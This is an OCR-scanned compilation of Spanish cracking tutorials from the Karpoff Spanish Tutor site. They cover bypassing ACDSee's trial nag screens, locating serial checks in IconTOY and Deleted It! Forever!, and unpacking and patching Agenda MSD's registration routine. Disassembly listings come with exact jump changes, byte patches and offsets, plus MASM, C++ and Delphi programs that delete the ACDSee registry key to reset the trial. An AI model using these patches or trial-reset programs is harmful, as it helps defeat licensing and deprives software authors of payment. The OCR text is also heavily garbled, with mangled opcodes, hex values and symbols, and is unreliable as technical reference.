:10002ECB E8001 10000 call 10003FDO 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:10002EB2(C) 


:10002EDO 8B442404 mov eax, dword ptr [esp+04] 
:10002ED4 85CO0 test eax, eax 

:10002ED6 7407 je 10002EDF 

:10002ED8 C7460C01000000 mov [esi+0C], 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:10002ED6(C) 


:10002EDF 8B460C mov eax, dword ptr [esi+0C] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:10002E8B(C) 


:10002EE2 SE pop esi 
:10002EE3 83C408 add esp, 00000008 
:10002EE6 C3 ret 


Si "¡ne 10002EE2" lo cambiamos por un "¡ne 10002E8D"” continua (nos 
muestra el dialogo de "ExtensionCode", y si cambiamos "je 10002EDO" 
por "je 10003EB4" continua y nos muestra la nag de inicio de 
evaluación, otra solucion era cambiar "¡ne 10002EE2" por un 

"JMP 10002EDO0", pero igual muestra la Nag de inicio de Evaluación. 


Volvamos a atras. 


La Función "ShowWelcomeDlgCLicenseO (2QAEHXZ" la han llamado desde la 
dirección "10003214". Vayamos: 


Exported fnO): ?ShowNagDlgCLicenseO OCQAEHPAHOZ - Ord:0028h 
:100031F0 81EC1C070000 sub esp, 0000071C 

:100031F6 53 push ebx 

:100031F7 55 push ebp 

:100031F8 56 push esi 

:100031F9 57 push edi 

:100031FA 8BBC2430070000 mov edi, dword ptr [esp+00000730] 
:10003201 8BF1 mov esi, ecx 


:10003203 C70700000000 mov dword ptr [edi], 00000000 
* Reference To: License. ?IsFirstRunAfterInstallO CLicense E EQAEHXZ 


:10003209 ES72FCFFFF call 10002E80 (esta es la que llama) 
:1000320E 85CO0 test eax, eax 

:10003210 8BCE mov ecx, esi 

:10003212 741D je 10003231 

* Reference To: License.?ShowWelcomeDlgOCLicense O OQAEHXZ 


:10003214 ES47FDFFFF call 10002F60 
:10003219 C70701000000 mov dword ptr [edi], 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:1000334F(C), :100033CF(C) 


:1000321F 5F pop edi 

:10003220 SE pop esi 

:10003221 5D pop ebp 

:10003222 B801000000 mov eax, 00000001 
:10003227 5B pop ebx 

:10003228 81C41C070000 add esp, 0000071C 
:1000322E C20400 ret 0004 


Caimos con ShowNagDlg (esto me suena al tipo de nag a mostrar). 


Si entramos en el salto "je 10003231" vemos el siguiente codigo: 


* Reference To: License.?GetAppMode O CLicense O OQAE?AW4typAppModeO OXZ 


:10003231 ESOAFCFFFF call 10002E40 
:10003236 83F805 cmp eax, 00000005 
:10003239 7405 je 10003240 
:1000323B 83F823 cmp eax, 00000023 
:1000323E 7519 ¡ne 10003259 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:10003239(C) 


:10003240 8BCE mov ecx, esi 
* Reference To: License.?ShowInputDlgOCLicense Oo OQAEHXZ 


:10003242 ES69FFFFFF call 100031B0 
:10003247 8BCE mov ecx, esi 
* Reference To: License.?GetAppMode O CLicenseO OQAE?AW4typAppModeO OXZ 


:10003249 E8SF2FBFFFF call 10002E40 

:1000324E 83F82D cmp eax, 0000002D 

:10003251 7506 ¡ne 10003259 

:10003253 C70701000000 mov dword ptr [edi], 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
[:1000323E(C), :10003251(C) 


:10003259 8BCE mov ecx, esi 
* Reference To: License.?TrialPeriod_GetDaysLeftO CLicense 0 OQAEHXZ 


:1000325B E840EEFFFF call 10002040 
:10003260 85CO0 test eax, eax 


:10003262 7D04 jge 10003268 
:10003264 33FF xor edi, edi 
:10003266 EB09 ¡mp 10003271 


Bueno aqui esta claro este verifica el tipo de aplicación y ademas 
posee la función "ShowInputDlgCLicenseO OQAEHXZ", entre otras 
cosas verifica el tiempo. 


Lo que hay que hacer es cambiar la dirección del salto "je 10003231", 
pero recuerda que "call 10002E80" llama a la info del Registro de 
Windows para ver si es la lra vez que se ejecuta el programa, 


Siempre tiene que pasar por "je 10003231" para verificar si estamos 
en el periodo de evaluación o fuera de el. 


Como pueden observar aqui: 
* Reference To: License.?GetAppMode O CLicense O OQAE?AW4typAppModeO OXZ 


:10003231 ESOAFCFFFF call 10002E40 
:10003236 83F805 cmp eax, 00000005 
:10003239 7405 je 10003240 
:1000323B 83F823 cmp eax, 00000023 
:1000323E 7519 ¡ne 10003259 


"cmp eax, 00000005" compara eax con "00000005", si salta nos muestra 
la ventana del ExtensionCode, "cmp eax, 00000023", cumple la misma 
función que el "00000005", pero salta si no son iguales "jne 10003259" 
(Jump Not Equals), pero el problema es que si salta y no estamos 

en evaluación se produce un error. (compruebalo cambiando el appmode 
en el registro de windows por 50000000). 


Voy a Colocar parte del codigo que vamos a modifcar para que lo 
observen: 


Exported fn(): ?ShowNagDlgOCLicense o CQAEHPAHOZ - Ord:0028h 
:100031F0 81EC1C070000 sub esp, 0000071C 

:100031F6 53 push ebx 

:100031F7 55 push ebp 

:100031F8 56 push esi 

:100031F9 57 push edi 

:100031FA 8BBC2430070000 mov edi, dword ptr [esp+00000730] 
:10003201 8BF1 mov esi, ecx 

:10003203 C70700000000 mov dword ptr [edi], 00000000 

* Reference To: License. ?IsFirstRunAfterInstall E CLicense o ECQAEHXZ 


:10003209 ES72FCFFFF call 10002E80 (esta es la que llama) 
:1000320E 85CO0 test eax, eax 

:10003210 8BCE mov ecx, esi 

:10003212 741D je 10003231 <-------------==-==-- | 

* Reference To: License.?ShowWelcomeDlgO CLicense O EOQAEHXZ | 


:10003214 E847FDFFFF call 10002F60 | 
:10003219 C70701000000 mov dword ptr [edi], 00000001 <--| 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:1000334F(C), :100033CF(C) 


:1000321F SF pop edi 
:10003220 SE pop esi 


:10003221 5D pop ebp 

:10003222 B801000000 mov eax, 00000001 
:10003227 5B pop ebx 

:10003228 81C41C070000 add esp, 0000071C 
:1000322E C20400 ret 0004 


"call 10002F60" llama a la Nag de Bienvenida. 


Lo que hay que hacer es cambiar "je 10003231" por "¡mp 10003219" 
para haci no ir a las ventanas y saltar la llamada. 


O Tambien se podria modificar "mov edi, dword ptr [esp+00000730]" 
por un "JMP 1000321F", y saltamos las Nag y nos ahorramos el tiempo 
en el cual el verificaria todo que, es aproximadamente 1 segundo o 2. 
Pero el Tiempo es ORO. Su explicación de que no podemos colocar 

el salto antes es: 


Exported fn(): ?ShowNagDlgOCLicense Oo CQAEHPAHOZ - Ord:0028h 
:100031F0 81EC1C070000 sub esp, 0000071C 

:100031F6 53 push ebx -->(empuja valor a ebx) 

:100031F7 55 push ebp -->(empuja valor a ebp) 

:100031E8 56 push esi -->(empuja valor a esi) 

:100031F9 57 push edi -->(empuja valor a edi) 

:100031FA 8BBC2430070000 mov edi, dword ptr [esp+00000730] 
:10003201 8BF1 mov esi, ecx 

:10003203 C70700000000 mov dword ptr [edi], 00000000 

* Reference To: License. ?IsFirstRunAfterInstallO CLicense E ECQAEHXZ 


:10003209 ES72FCFFFF call 10002E80 (esta es la que llama) 
:1000320E 85CO0 test eax, eax 

:10003210 8BCE mov ecx, esi 

:10003212 741D je 10003231 

* Reference To: License.?ShowWelcomeDlgO CLicense O OQAEHXZ 


:10003214 Es47FDFFFF call 10002F60 
:10003219 C70701000000 mov dword ptr [edi], 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:1000334F(C), :100033CF(C) 


:1000321F SF pop edi -->(pide el valor de edi) 
:10003220 5E pop esi -->(pide el valor de esi) 
:10003221 5D pop ebp -->(pide el valor de ebp) 
:10003222 B801000000 mov eax, 00000001 
:10003227 5B pop ebx -->(pide el valor de ebx) 
:10003228 81C41C070000 add esp, 0000071C 
:1000322E C20400 ret 0004 


Los registros antes nombrado son necesarios para la ejecución del 
programa y ejecución del "ret 0004", "sub esp, 0000071C" resta 
a ESP para verificar si estamos en evaluación, depues 

"add esp, 0000071C” nos regresa a la evaluación, mejor dicho 

si se ejecuta solo el "ret 0004" estamos fuera de la evaluación. 


Si el cambio que ejecutamos es el que omite mas codigo (el que 
nombre ahorita), no pasara a la lectura del registro de WelcomeNag, 
es decir la lectura del programa sera más rapida, y si borras 
WelcomeNag del registro esta no sera creada. 


Aunque se puede hacer uno más limpio: 


Podemos Modificar "je 10003231" como es el que verifica la información del appmode y pide el registro lo que se debe 
hacer es cambiarla "¡ne 10003214" para que continue y el valor de appmode=0,0 mejor dicho appmode no existe, se 
cambia por un "JNE" (jump not equals) debido a que eax=eax, es un salto obligatorio,al cambiarlo por "JNE" salta 
cuando eax no sea igual a eax, como resultado continua en evaluación; entramos en la llamada "call 10002E80" 
(muestra la nag) y se vee: 


Exported fn(): ?IsFirstRunAfterInstall E CLicenseo EQAEHXZ - Ord:001Dh 
:10002E80 83EC08 sub esp, 00000008 

:10002E83 56 push esi 

:10002E84 8BF1 mov esi, ecx 

:10002E86 8B460C mov eax, dword ptr [esi+0C] 
:10002E89 85CO0 test eax, eax 

:10002E8B 7555 ¡ne 10002EE2 

:10002E8D 89442404 mov dword ptr [esp+04], eax 
:10002E91 8D442408 lea eax, dword ptr [esp+08] 
:10002E95 8D4C2404 lea ecx, dword ptr [esp+04] 
:10002E99 50 push eax 

:10002E9A 51 push ecx 

:10002E9B 8B4E04 mov ecx, dword ptr [esi+04] 


* Possible StringData Ref from Data Obj ->"WelcomeNag" 


:10002E9E 6884410110 push 10014184 

:10002EA3 C744241404000000 mov [esp+14], 00000004 
:10002EAB E8000F0000 call 10003DBO 

:10002EBO 85CO0 test eax, eax 

:10002EB2 741C je 10002EDO 

:10002EB4 8B4E04 mov ecx, dword ptr [esi+04] 
:10002EB7 8D542404 lea edx, dword ptr [esp+04] 
:10002EBB 6A04 push 00000004 

:10002EBD 52 push edx 


* Possible StringData Ref from Data Obj ->"WelcomeNag" 


:10002EBE 6884410110 push 10014184 
:10002EC3 C744241001000000 mov [esp+10], 00000001 
:10002ECB E8001 10000 call 10003FDO 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:10002EB2(C) 


:10002EDO 8B442404 mov eax, dword ptr [esp+04] 
:10002ED4 85CO0 test eax, eax 

:10002ED6 7407 je 10002EDF 

:10002ED8 C7460C01000000 mov [esi+0C], 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:10002ED6(C) 


:10002EDF 8B460C mov eax, dword ptr [esi+0C] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:10002E8B(C) 


:10002EE2 5E pop esi 


:10002EE3 83C408 add esp, 00000008 
:10002EE6 C3 ret 


En " ¡ne 10002EE2" se observa que salta si eax no es igual a eax, lo cambiamos por " je 10002EE2", ahora siempre 
vamos al ret y no nos muestra la welcomenag. 


Realmente hace lo mismo que el del JMP que les habia nombrado pero es menos brusco. 
OTRO PUNTE DE ATAQUE MAS (¿y cuantos son?): 
Desarrollar una aplicación con la cual siempre nos borre el registro: 


No se puede hacer un injerto debido a que produce un error interno en el programa. 


Para ensamblador: (MASM32) tamaño del ejecutable 2.50kb 


.386 

.model flat, stdcall 

option casemap:none 

include imasm32úincludewindows.inc 
include imasm32úincludekernel32.inc 
include iÍmasm32Wincludetadvapi32.inc 
includelib imasm32Miblkernel32.1ib 
includelib imasm32Mibladvapi32.lib 


«data 
Directorio db "SoftwarlACD SystemslACDSee",0 
File db "CiArchivos de programalACD SystemslACDSeelACDSee.exe",0 


.code 
start: 


push offset Directorio 
push HKEY_LOCAL_MACHINE 
call RegDeleteKey 


push SW_SHOW 
push offset File 
call WinExec 


push 0 
call ExitProcess 


end start 


Para C++: (compilador en uso DevC++4) tamaño del ejecutable 4.50kb 


Hinclude <stdio.h> 
HHinclude <windows.h> 


int main(int argc, char *argv[]) 


( 


RegDeleteKey(HKEY_LOCAL_MACHINE,"softwareWacd SystemsWacdseeW”); 
WinExec("c:Warchivos de programaWacd systemsWacdseeWacdsee.exe",SW_SHOW); 


return 0; 


) 


Para C++: (Compilador en uso DevC++4) tamaño del ejecutable 5kb (modo WinMain): 
Mas Veloz que modo Consola 
ttinclude <windows.h> 


int STDCALL 
WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR IpCmd, int nShow) 


[ 
RegDeleteKey(HKEY_LOCAL_MACHINE,"softwareWacd SystemsWacdseewW”); 


WinExec("c:Warchivos de programaWacd systemsWacdseeWacdsee.exe",SW_SHOW); 


return 0; 


) 


Para Delphi: tamaño del ejecutable 150kb o más 
program Project2; 
(SAPPTYPE CONSOLE] 


uses 

SysUtils, Windows; 
var 

Key, Archivo:String; 
begin 


Key:='SoftwarelACD SystemslACDSee'; 

Archivo:='CAArchivos de programalACD SystemslACDSeelACDSee.exe'; 
RegDeleteKey(HKEY_LOCAL_MACHINE,PChar(Key)); 
WinExec(PChar(Archivo),SW_SHOW); 


[ TODO -oUser -cConsole Main : Insert code here ) 
end. 


LLEGAMOS AL FINAL 


Bueno llegamos al final gracias a todos, a Numit Or, a +ORC, bueno gracias atodos, por que si no me voy en 
nombrar a todo el mundo.Gracias, Gracias; saludos a todos, es una lastima que Black Fenix dejo el negocio, 
pero eso es mentira uno siempre se regresa a las raices... 


gohanO chevere.com. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 


Descripcion: 


Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


IconTOY v3.1 y Deleted It! Forever! 


Name / Serial 
Encontrar los seriales válidos 


IconTOY está diseñado especialmente para extraer iconos (ICO, 
ICL, EXE, DLL, BMP) de cualquier archivo que los contenga. 


Deleted It! Forever! elimina definitivamente un archivo que 
nosotros deseemos borrar. 


Novato. 


IconTOY aqui, Deleted It! Forever! aqui 


W32dasm 


ByTESCRK FECHA: 03/12/2001 


INTRODUCCION 


Estas son utilerías muy bonitas, bueno, ni tanto, sin embargo, en lo que me compete únicamete he 
buscado y visto algunos de mis cientos de archivos con iconos que vienen de regalo en el Windows, y 
es que que haríamos sin ellos, para identificar a cierta aplicación, sin lugar a dudas son unos bonitos 
dibujos que nos identifican cada una de las aplicaciones que tenemos instaladas en nuestra PC. 


En lo que respecta a Delete It! Forever! solo quiero decirles que lo he puesto como referencia debido 
a que este tipo de protección es igual es decir los programas tienen mucho en común en su 
protección y los autores son diferentes. 


En esta protección, cómo verán la única herramienta que necesitamos es el W32DASM y nada más. 
Cómo ya verán seguiremos los pasos de la aplicación, bueno entonces vayamos... 


AL ATAKE 


Cómo en cada programa, vayamos a ver que mensaje de error nos dá, abrimos el programa |IconTOY y ya 
que estamos en la ventana principal, vemos en la parte superior que hay un letra "R", junto a ella está un 
signo de interrogación y tres letras de World Wide Web. Hacemos clic en la letra "R"egister y nos 
aparece una nueva ventana con el título About y con dos pestañas, una de About y otra de Registration y 
abajo los campos para ingresar nuestro "Registration name" y el "Registration code", ingresamos los de 
siempre y damos clic en el botón "Register!" y nos aparece una nueva ventana diciéndonos "Registration 
key error!", bueno entonces vayamos a desensamblar nuestro programa y una vez desensamblado nos 
vamos a las Reference Strings y buscamos la cadena y... empieza lo bueno... 


:00486074 EBOA jmp 00486080 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00485FAC(C) <= Vamos aqui... 
| 


* Possible StringData Ref from Code Obj ->"Registration key error!" 


| 
:00486076 B838614800 mov eax, 00486138 <= Aqui caemos 
:0048607B E80080FCFF call 0044E080 


Vamos a ir a la dirección 00485FAC haciendo uso del botón Code Location en la barra de botones del 
W32DASM y vamos a ver esto... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00485F26(C) 


| 

:00485F94 E913D6F7FF ¡mp 004035AC 

:00485F99 EBF8 ¡mp 00485F93 

:00485F9B A104E94800 mov eax, dword ptr [0048E904] 

:00485FAO E8B3FCFFFF call 00485C58 <= Aqui se genera el serial... 

:00485FA5 803D00E9480001 cmp byte ptr [0048E900], 01 <= Compara con 1 si no 
:00485FAC 0F85C4000000 ¡ne 00486076 <= Nos da el error 

:00485FB2 8D55F8 lea edx, dword ptr [ebp-08] 

:00485FB5 8B45FC mov eax, dword ptr [ebp-04] 


Vamos a entrar en la llamada a generar el serial, haciendo uso del botón CALL en la barra del W32DASM y 
vemos que en EAX ya se ha guardado nuestro serial... 


* Referenced by a CALL at Addresses: 
|:00485FAO , :00486233 <= Hay dos llamadas... 


| 

:00485C58 55 push ebp 
:00485C59 8BEC mov ebp, esp 
:00485C5B 6A00 push 00000000 
:00485C5D 33D2 xor edx, edx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

|:00485BFO(C) 

| 

:00485C5F 55 push ebp 

:00485C60 68CD5E4800 push 00485ECD 

:00485C65 64FF32 push dword ptr fs:[edx] 

:00485C68 648922 mov dword ptr fs:[edx], esp 

:00485C6B 3D8CA6BADOO cmp eax, 00000000 <= Compara EAX con este valor hex 
:00485C70 0F84B9010000 je 00485E2F 

:00485C76 3D6A5A1300 cmp eax, 00000000 <= Compara EAX con este otro valor hex 
:00485C7B 0F84AE010000 je 00485E2F 

:00485C81 3DE0621300 cmp eax, 00000000 <= y con este valor hex y con otros 44 
:00485C86 0F84A3010000 je 00485E2F 


Los valores originales fueron reemplazados por estos ceros "00000000", para no hacerte la vida demasiado 
fácil y no tengas en cuenta los recordatorios de siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si ha USTED, le gusta el producto por favor 
COMPRELO, algunas veces... los autores merecen su dinero ;o)" 


Bueno vayamos al segundo programa, lo abrimos y ha cargado, vemos en el menú por algo que nos parezca 
familiar y encontramos lo siguiente bajo el menú HELP > Register Me Now, nos aparece una ventana que 
nos dice que ingresemos el serial bueno, ingresamos "19770424" y nos dice "Wrong keycode. Please try 


again..", bueno vamos a desensamblar y buscamos esto en las Reference Strings... si ya lo hayamos doble 
clic sobre ella y nos vamos a... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00497C3E(C)<= Vamos aqui... 


| 
* Possible StringData Ref from Code Obj ->"Wrong keycode. Please try again.." 


| 
:00497C6B B8607D4900 mov eax, 00497D60 <= Aqui caemos... 
:00497C70 E8B355FAFF call 0043D228 


Vamos a ir a 00497C3E con el botón Code Location y... aparecemos aqui... 

* Possible StringData Ref from Code Obj ->"Please enter your keycode here.." 
aaa BAA47C4900 mov edx, 00497CA4 

* Possible StringData Ref from Code Obj ->"Register Me.." 


| 

:00497C27 B8D07C4900 mov eax, 00497CDO 
:00497C2C E85727FBFF call 00444388 
:00497C31 8B45FC mov eax, dword ptr [ebp-04] 


* Possible StringData Ref from Code Obj ->"XXXx" <= Aqui debe aparecerte el serial bueno 


| 

:00497C34 BAE87C4900 mov edx, 00497CE8 

:00497C39 E88AC1F6FF call 0O403DC8 <= Entramos aqui... 
:00497C3E 752B ¡ne 00497C6B <= Aqui caemos 
:00497C40 8B1590624A00 mov edx, dword ptr [00446290] 
:00497C46 8B12 mov edx, dword ptr [edx] 

:00497C48 8D45F8 lea eax, dword ptr [ebp-08] 


Al entrar en la llamada vemos que el programa compara nuestro serial malo con la palabra XXXx (Nota: 
XXXx no es un serial válido fué omitido), si no coinciden sale y va al error, sino continua y crea un 
archivo de nombre "reggycode" en el directorio de la aplicación... y así como esta puedes encontrar más 
aplicaciones en Igosaur con la diferencia que los seriales o palabras claves son distintas. 


* Possible StringData Ref from Code Obj ->"reggycode" 


| 

:00497C4B B9F87C4900 mov ecx, 00497CF8 
:00497C50 EBAFCOFEFF call 00403D04 
:00497C55 8B55F8 mov edx, dword ptr [ebp-08] 
:00497C58 8BC3 mov eax, ebx 

:00497C5A 8B08 mov ecx, dword ptr [eax] 
:00497C5C FF5164 call [ecx+64] 


* Possible StringData Ref from Code Obj ->"Thank you for registering.." 

| 

:00497C5F B80C7D4900 mov eax, 00497DOC 

:00497C64 E8BF55FAFF call 0043D228 

:00497C69 EBOA ¡mp 00497C75 

Bueno así hemos conseguido extraer los seriales válidos para estas dos herramientas, ahora lo mismo de 
siempre, seguramente me dirás que ya sabes "que tienes que comprar el programa si me gusta", no es 
precisamente por eso, sino que así contribuyes a que tu conciencia esté tranquila. 


Ya por último saludos a mis buenos amigos Karpoff, ProOfesor_X, CaoS ReptantE y a todos los crackers 
hispanohablantes. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Agenda MSD —'v.2.5 


Programa 


PROTECCION: Name / Serial. 
Descripcion: Agenda Electronica. 
Dificultad: Inexistente. 
DOWNLOAD: http://www. msdsoft. com 


Herramientas: W32dasm, Softlce, File Inspector, Procdump, Uedit y UnAspack. 


CRACKER: Asterion FECHA: 02/01/2002 


INTRODUCCION 


Saludos a todos los que como yo se inician en el mundo del cracking, este es mi primer tutorial asi que 
espero contribuir en algo a ayudar a los que aun se sienten "perdidos en el espacio", Aunque yo me siento 
asi la mayor parte del tiempo. 


Analizaremos este programa con la tecnica del Listado Muerto, en el PRIMER ATAQUE y en "LIVE" en el 
SEGUNDO ATAQUE. Les recomiendo leer lo mas posible sobre assembly, conocer por lo menos un poco 


de un lenguaje de programacion ademas del antes mencionado y practicar, practicar y practicar un poco 
mas... 


ESTE TUTORIAL FUE ESCRITO SOLO PARA USO EDUCACIONAL 


Pongo eso solo por siacaso y por que lo he visto en otros tutoriales ;-) 


AL ATRAKE 


PRIMER ATAQUE a parchar se ha dicho... 


Como primer paso Instalemos el programita, ejecutemoslo y ... %é$"G*% Una Gran Nag nos recibe 
para informarnos sobre la Agenda y nos pide nuestra colaboracion en Dolares. Quizas en otro momento. 


Luego de un pequeño manoseo para saber que cosas puede hacer y donde se encuentra la ventanita de 

registro (Mantenimiento/ Desbloquear el programa)... Uy que seguro es este programal!! 24 caracteres 

en la clave de registro!!! empiezo a pensar que mas facil sera parcharlo que sacar el serial valido (aunque 
no necesariamente como veremos mas tarde). 


Bueno Ahora si. Analicemos el programa con el file inPEctor. 


Aja!! Empacado, no importa para eso tenemos el Procdump, buscamos en Unpack el empacador Aspack 
108.4, seleccionamos el ejecutable en cuestion y  YA...... no....Que? se colgo. Luego de tratar 
varias veces y con sus variantes no consegui nada, asi que lo tendre que hacer a mano :-(. Pero voy a 
hacer el ultimo intento. Ejecuto el UnAspack (una joyita para estos menesteres), selecciono el ejecutable 
y... Este si lo logro. Nada menos que de 1.9 Mb a 4.7 Mb 


Ahora desensamblemoslo. Que rapido! para ser 4.7Mb Pero no aparecen las StringRef, y tampoco aparece 
el codigo, solo hasta la cabecera. Uhmm...... otro Uhmm...... pero si ya lo habiamos desempacado...... 
Uhmm, a ver veamos como estan sus valores en en PE Editor del Procdump... 

Sections Editor 


0024F000 00001000 0024E800 00000400 Co000040 
00007000 00280000 00006200 0024EC00 20000040 


ODOOCODO 00287000 00000000 00284E00 Co000040 
00004000 00203000 00003600 00284E00 20000040 
00001000 00207000 00000000 00288400 Co000040 
00001000 002C8000 00000200 00288400 C0000040 


Fijemonos un momento en el campo Characteristics del Name CODE. CO0000040h osea que: no hay 
codigo, no se pueden escribir datos ni compartir datos (leer los textos de nuMIT_or sobre "Descabezando 
archivos ejecutables portables") Asi que lo cambiaremos a E0000020h, - click derecho sobre la seccion 
CODE y luego Edit Section. 


Con Esto sera suficiente, Ahora desensamblemoslo. esto si que esta demorando, no es para menos con 
4.7Mb de ejecutable, me voy a tomar un cafe y a ver television. Por fin lo guardamos y comenzamos a 
buscar StringRef que nos parezcan conocidas, como esta que esta aca "El programa no se ha registrado 
correctamente bla, bla, bla. 


:00687632 50 push eax 

:00687633 SD55FS lea edx, dword ptr [ebp-08] 
:00687636 S8BS83F0020000 mov eax, dword ptr [ebx+000002F0] 
:0068763C ESB?E7DEFF call 00445DF8 

:00687641 8B45F8S mov eax, dword ptr [ebp-08] 
:00687644 52 pop edx 

:00637645 ES425BF3FF call O0S5BD18C 

:00687644A ESSl5cF3FF call O0S5BD2ZDO 

:0068764F 84C0 test al, al 

:00687651 741A je 0068766Db 

:00687653 Bl10O1 mov cl, Ol 


* Possible StringData Ref from Code 0b3 ->="Enhorabuena, el programa ha sido " 


:00687655 BA04776800 

:00687654 33C0 

:0068765C ESD?IE9FOFF 

:00637661 C?833402000001000000 
:0063766B EB54 


* Referenced by a (DU)nconditional 


=>"registrado satisfactoriamente" 
| 
mov edx, 00687704 
xor eax, eax 
call 0058E038 
mov dword ptr [ebx+00000234], 
jmp 006876C1 


00000001 


or (Cjonditional Jump at Address: 


|:00687651(C) 

| 

:0068766D S8D45F4 lea eax, dword ptr [ebp-0C] 
:00687670 50 push eax 

:00687671 8D45E83 lea eax, dword ptr [ebp-18] 
:00687674 ESS7EGF1FF call 005A5D00 

:00687679 SB45ES mov eax, dword ptr [ebp-18] 
:0068767C 8945EC mov dword ptr [ebp-14], eax 
:0068767F C645FOOB mov [ebp-10], OB 

:00687683 SDSSEC lea edx, dword ptr [ebp-14] 
:00687686 3309 xXOr ecx, ecx 


* Possible StringData Ref from Code 0b3 


->"El programa no se ha registrado " 
->"correctamente. Compruebe que los " 
=>"datos introducidos coinciden exactamente " 
=>"con los suministrados por %+s para " 

->"el registro del programa." 


Que interesante, la cadena de texto anteriormente dicha esta bastante cerca de la que nos anuncia el exito 
en el registro. Ok observen ese saltito en 00687651 je 0068766D que nos manda directamente al 
mensaje de error, el cual depende de el "testeo" en 0068764F. 


A ver, si fueramos poco inteligentes cambiariamos el je (salta si es equivalente) por un jne (salta si no es 
equivalente) por una sencilla razon, solo lograriamos que luego de meter el serial incorrecto nos saldria la 
ventanita de felicitaciones pero no estariamos registrados. El verdadero registro o comprobacion se 
produce en la call que se encuentra inmediatamente antes del "testeo" osea en 0068764A. Esta call es 
llamada por varias rutinas que se encargan de verificar si el programa esta registrado o no, para darle 
todas las facilidades del caso. Por eso es que cambiando el salto no logramos nada. 


Ok que hacemos entonces, debemos saber cual es el valor que devuelve luego de la call osea el valor que 
tiene al al momento de hacer el testeo. Abri el Softlce y puse un Bpx en la direccion del test y observe los 
valores que lleva al, O y O. En otras palabras O es cuando no esta registrado y 1 cuando si lo esta, asi que 
trataremos de que la call nos mande el valor de 1 a la fuerza!!!. Alla vamos, abramos nuevamente el 
W32Dsm, entramos en la call y caemos en: 


Offset= 10c6d0 
Offset= 1bc6d1 


005BD2D0 55 push ebp 
005BD2D1 8BEC mov ebp, esp (Estas son las dos 1ras lineas) 

Solo por siacaso el Offset no sale en el desensamblador al costadito como aqui sino abajo (W32Dsm) pero 
yo lo pongo alli para que lo veas claro. Aqui pondremos el parche, pondremos: 


|005BD2D0 B001 mov al, 01 Offset= 1BC6DO 
¡/005BD2D1 c3 ret Offset= 1BC6D1 


Los numeros en amarillo, que son la instruccion en Hexadecimal los sacas usando el debuger del 
W32Dsm, en Debug/ Load Process/ Load y se abren dos ventanitas mas, presionamos Goto Address, 
ponemos la direccion en la que vamos a poner el parche y pulsamos Ok. Una vez que lo tenemos en 
pantalla pulsamos sobre Patch Code y en "Enter New Instruction Below" ponemos la nueva instruccion 
¡osea por ejemplo: mov al,01 luego Enter, y tenemos el parche, Osea el B001, Antes quiero advertirles que 
¡deben cambiarse siempre el mismo numero de bytes que encuentras Asi que pongan atencion: en 
005BD2D0 esta el 55, Osea 1 byte, Luego en 0O05BD2D1 el 8BEC que son 2 bytes. sumados son 3 bytes. 
Y que coincidencia B001 y C3 son tambien 3 bytes!! Que bien, pues hagamoslo. Abrimos el UltraEdit y en la 
copia del programa atacado que ya debes haber creado (siempre trabaja en una copia) modificamos los 
¡Offsets arriba indicados, introducimos los cambios tambien mencionados anteriormente y guardamos. 


Haber ejecutemos la copia y... Que veo Programa Registrado, y nisiquiera tuve que ponerle los datos ni un 
numero de serie (aunque sea falso). 


Bueno no importa, PROGRAMA CRACKEADO 


¡| Pd. algo curioso: en "programa registrado a nombre de.." sale "CCCCCCCC" si alguien averigua porque 
¡| hagamelo saber que ya no quiero saber mas de este programa. 


SEGUNDO ATAQUE - obtener el serial... 


¡Luego de haber Desempacado el Ejecutable como se indica en el PRIMER ATAQUE, cargamos el Softlce 
¡y Seleccionamos el Ejecutable de la Agenda, luego volvamos a sacar la ventanita donde se pone el serial. 


¡| En ella indica que debemos poner nuestro nombre, "que debe ser compuesto y de por lo menos 8 

¡| caracteres". Luego de probar un ratito, descubrimos que son 8 minimo incluido el espacio. Bueno le 
pondremos: asterion 10, y en el campo del serial, algo facil de encontrar: 1010-1010-1010-1010-1010- 
1010. Luego pongamos Un Bpx en la funcion: hmemcpy para lograr la interrupcion. Damos click en Aceptar 

¡y Ya estamos en el Softlce. 


¡Comencemos a teclear F12 (el cual ejecuta todas las sentencias que le siguen incluyendo el primer ret que 
encuentre) hasta que estemos dentro del codigo de la AgendaMSD. Ahora borremos el 
breakpoint en hmemcpy, y ponemos uno nuevo en la Call que mencionamos en al primer ataque, osea en 
0068764A, luego tecleamos Ctrl-D para salir del Softice y entrar nuevamente a el, pero en la direccion de la 
Call. Entremos en ella (F8) y comenzemos a tracear (F10) digitando de vez en cuando D EAX para conocer 

¡los valores de eax en las diferentes partes del codigo. 


Bueno eso es todo, ya que luego de tracear un buen rato, a veces saltando ( G direccion) para evitar un 
bucle y a veces entrando a otra call y a veces saliendo, nos encontraremos en la ventana de datos, por alli 
¡en alguna parte... con el serial correcto. No sera muy dificil ya que es la unica cadena de texto de 24 
| caracteres que anda por alli (excepto por el serial falso que pusimos). 


Para: asterion 10 el 
